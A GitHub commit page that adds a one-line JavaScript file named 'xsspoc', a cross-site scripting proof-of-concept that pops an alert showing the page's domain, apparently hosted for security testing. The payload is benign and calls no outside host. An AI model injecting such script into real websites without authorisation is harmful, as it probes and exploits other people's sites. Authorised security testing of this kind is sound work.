Skip to content
This repository was archived by the owner on Jun 12, 2023. It is now read-only.

Commit c9fb265

Browse files
committed
Add the XSS PoC JavaScript resource.
1 parent 8dc5eec commit c9fb265

File tree

1 file changed

+1
-0
lines changed

1 file changed

+1
-0
lines changed

xsspoc

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
!document.domain ? alert('XSS') : alert(document.domain);

0 commit comments

Comments
 (0)